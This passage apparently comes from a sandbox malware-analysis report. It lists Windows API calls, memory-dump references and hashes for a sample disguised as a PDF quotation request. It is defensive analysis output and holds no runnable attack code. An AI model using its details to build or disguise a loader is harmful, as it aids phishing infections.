                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 334405425-0
                                                                                                                                  • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                  • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                                                  • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                  • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000460,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Enum$CloseOpenValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 167947723-0
                                                                                                                                  • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                  • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                                                  • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                  • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000460,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                  • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                  • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                                                  • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                  • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                  • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                                                  • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                  • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                    • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                                    • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                  • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                  • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                                                  • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                  • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnableShow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1136574915-0
                                                                                                                                  • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                  • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                                                  • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                  • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                  • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                  • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                  • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                  • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405714
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                  • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                  • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                                                  • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                  • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                                  • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocErrorLastVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 497505419-0
                                                                                                                                  • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                  • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                                  • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                  • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                    • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointerwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 327478801-0
                                                                                                                                  • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                  • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                                                  • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                  • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                                                  APIs
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 390214022-0
                                                                                                                                  • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                  • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                                  • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                  • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000460,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                  • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                                                  • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                  • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                  • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                  • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                                                  • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
